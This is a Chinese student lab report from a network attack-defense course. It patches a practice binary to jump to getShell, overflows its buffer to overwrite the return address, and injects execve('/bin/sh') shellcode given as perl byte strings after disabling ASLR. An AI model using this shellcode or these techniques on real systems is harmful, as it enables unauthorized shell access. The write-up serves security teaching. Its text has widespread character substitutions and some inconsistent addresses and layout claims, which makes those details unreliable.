2018-2019 2 20165203 《网络对抗技术》 Exp1 PC平台逆向破解

2018-2019 2 20165203 《网络对抗技术》 Exp1 PC平台逆向破解

实验要求

1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

2.掌握反汇编与十六进制编程器

3.能正确修改机器指令改变程序执行流程

4.能正确构造payload进行bof攻击

实验内容

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数

• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数

• 注入一个本身制做的shellcode并运行这段shellcode

  预备知识

• 熟悉Linux基本操做
• 理解经常使用指令,如管道（|），输入、输出重定向（>）等
• 理解Bof的原理
• 理解汇编、机器指令、EIP、指令地址

• 会使用gdb,vi等基本指令

实验步骤

本次实验，咱们须要用到一个名为pwn1的可执行文件，有的同窗可能第一反应是文件中的内容是乱码。这是为何呢？咱们知道，计算机中信息=位+上下文，可执行文件的内容是计算机能够直接识别的语言，天然，用户就不必定可以认识了。

那么文件中到底是什么内容呢？咱们能够经过反汇编来查看，稍后具体操做，该文件中的程序正常的执行流程是：main执行foo函数，foo函数会简单回显任何用户输入的字符串。该程序的另外一个子函数为getshell，顾名思义，它的功能是返回一个终端shell，可是依据程序，这个函数是不会运行的。咱们本次实验的目标就是想办法运行这个代码片断。在这里有2种方法，3种实践内容。方法有二，其一，想办法运行代码片断，其二，就是注入运行shellcode。 因此，本次实验的目标就是

- 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
- 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
- 注入一个本身制做的shellcode并运行这段```shellcode```。

实践一 直接修改程序机器指令，改变程序执行流程

• 将pwn1文件移到PC的共享文件夹里，而后去Kali的/mnt/hgfs下将pwn_1文件复制到本身的实验文件夹中。

• 下载好后，咱们利用反汇编指令objdump -d 20165203_pwn1指令反汇编可执行文件，由此咱们能够查看文件的汇编语言。

• 经过汇编指令咱们能够观察到地址为80484b5处的指令call 8048491 <foo>。咱们能够分析一下：
  • 该指令的意思是调用地址为0x8048491处的foo函数。它对应的机器指令为(看汇编指令前面的机器指令）e8 d7fffffff, e8就是call的机器指令，跳转的意思。
  • 咱们能够分析，eip寄存器中存放的是下一步要执行指令的，在本程序中就是80484ba,可是d7又是怎么来的呢？咱们须要找到eip中的80484ba和d7还有8048491之间的关系，以便修改代码。咱们能够发现：d7ffffff是一个补码，为41=0x29,而80484ba + d7ffffff = 80484ba - 0x29就是8048491这个值。
  • 由此，咱们能够得出：
  • • 只须要在源机器代码中修改e8 d7ffffff中的d7ffffff为804847d(getshell的地址）- 8048ba的补码就能够了。
  • • 咱们还能够借助Windows自带的计算器来计算为c3ffffff，如图所示

通过以上的分析，咱们的目的就是修改文件中call指令后面的地址中的d7ffffff为c3ffffff,目的清晰，实验的步骤也就清晰多了。

• vim 20165203_pwn1，打开可执行文件。

• Esc键 -> :%!xxd切换到16进制模式，如图所示。

• 查找修改的内容。

• 确认位置是正确的后，按i进入编辑模式，修改d7为c3

• :%!xxd -r切换到16进制模式。
  
• :wq保存并退出。
• 再反汇编一下，看看call后面的地址是不是咱们所预想的那样呢？

• 输入./20165203_pwn1运行修改后的代码，就获得了shell终端。

实践二 构造输入参数，形成BOF攻击，改变程序执行流

• 用反汇编命令objdump -d 20165203_pwn2

• 咱们能够观察到，可执行文件所调用的函数foo有Buffer overflow漏洞。
• 咱们知道，调用函数经过堆栈来进行，咱们了解堆栈的结构，当咱们调用函数时，函数foo 804849a处的mov语句会读入字符串，读入的数据会超出系统保留的缓冲区，超出的部分会溢出覆盖返回地址，如图分析所示。

• 咱们能够利用这一点，将返回地址覆盖成80484ae。
• 由此，咱们的目标就明确了: 利用函数main中的call调用函数foo这一特色，在堆栈上压返回地址值：80484ae。
  
• 但是问题又来了。

缓冲区的大小是多少呢？输入数据的哪些部分会覆盖返回地址呢？

如图所示，经过观察foo函数中红色框框内的指令，咱们能够看到esp寄存器空出了0x38大小的位置，而eax寄存器又占到了0x1c大小的位置，ebp的大小为4个字节，因此，缓冲区的小小为0x38-0x1c+4为32字节。

• 咱们能够尝试输入字符串111111112222222233333333444444441234，如图所示。

• 咱们能够看到1234覆盖到了返回地址，咱们只要把这四个字替换为getshell的地址，就OK了。

  覆盖值的字节序是什么样的？如何构造覆盖值？

• 在call命令处设置断点，对比eip处的数据，输入1234，出来倒是4321.咱们能够肯定是11111111222222223333333344444444\x7d\x84\x04\x08。

• 由于输入的阿拉伯数字进到寄存器就变为ASCII码，因此，咱们没办法输入x7d这样的16进值，咱们须要构造字符串文件，使ASCII码为咱们想输入的16进值。利用Perl
• 输入xxd input查看input文件的内容。

• 将input的输入经过管道做为可执行文件20165203——pwn2的输入。咱们发现，实验成功。

实践三 注入Shellcode并执行

• 咱们要知道，shellcode就是一段机器指令。
• 一般这段机器指令的目的是为获取一个交互式的shell（像linux的shell或相似windows下的cmd.exe），因此这段机器指令被称为shellcode。
  在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。
• 具体能够参考Shellcode入门
• 此次实践的目的就是注入一段shellcode，运行起来，天然也就达到了实验目的了。

准备工做

• 使用apt-get install execstack命令安装execstack。
• 修改如下设置

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space // //查询是否关闭地址随机化 
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化

如图所示

具体操做及分析

• 咱们选择用来攻击buf的结构为retaddr+nops+shellcode，咱们须要在shellcode前填充nop的机器码90，最前面加上加上返回地址（先定义为\x4\x3\x2\x1），具体指令为perl -e 'print"\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode。

• 咱们来看一下\x4\x3\x2\x1部分要填什么。
  • 打开一个终端注入如下攻击buf：(cat input_shellcode;cat) | ./20165203_pwn3

• 打开另外一个终端来调试。
• 用ps -ef | grep 20165203_pwn3来查看20165203_pwn3进程号。如图所示，进程号为5023。

• 启动gdb, 输入attach 5023进行调试。

• 用disassemblr foo反汇编，经过设置断点，查看注入buf的内存地址。

• 使用break *0x080484ae设置断点，输入c命令运行，经过在20165203_pwn3进程正在运行的终端敲回车，使其继续执行。再返回调试端，使用info r esp命令查找地址。

• 使用x/16x 0xffffd3ec查看esp寄存器中的存放内容，咱们能够看到01020304,就是返回地址的位置。而根据咱们构造的input_shellcode（攻击buf的结构）可知，shellcode就在其后，因此地址是 0xffffd3ec+0x04为0xffffd3f0。

• 接下来将以前的\x4\x3\x2\x1改成这个地址便可, 须要使用命令perl -e 'print"\xf0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode。

• 使用(cat input_shellcode;cat) | ./20165203_pwn3运行文件，攻击成功。

实验中出现的问题及解决方法

Q1：在查看进程号时，发现./20165203_pwn3的进程号不见了，只有ps -ef | grep 20165203_pwn3的进程号。

A1：本身在新的终端打开./20165203_pwn3时，多敲了一个回车，意味着进程执行完毕，天然就不会显示进程号了。因此，在打开./20165203_pwn3时，不要敲回车，在调试时敲回车使进程继续执行。

Q2：注入Shellcode，咱们选择的是retaddr+nops+shellcode结构，还有其余的结构吗，咱们为何要选择上述结构呢？

A2：Linux下有两种基本构造攻击buf的方法：

• retaddr+nop+shellcode
• nop+shellcode+retaddr
• 由于retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面，简单说缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边
  咱们这个buf足够大，够放这个shellcode了。这里选择结构nop+shellcode+retaddr nop一为是了填充，二是做为“着陆区/滑行区”
  咱们猜的返回地址只要落在任何一个nop上，天然会滑到咱们的shellcode。

实验小结

• 实验感想：本次实验咱们主要学习了缓冲区溢出与shellcode，这是本身第一次尝试攻击程序，修改程序的路径，感受颇有意思，当攻击成功后，那种心里的知足感和成就感油然而生。固然，这其中也参考了学长学姐以前的博客，本身把本身思考分析的过程详细整理了一下，但愿本身在从此能学到更多关于网络对抗方面的知识。

• 问题：什么是漏洞？漏洞有什么危害？

1. 漏洞：在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可使攻击者可以在未受权的状况下访问或破坏系统。例如缓冲区溢出。
   
2. 危害：黑客入侵、病毒入侵、数据丢失和篡改、隐私泄露乃至形成经济损失。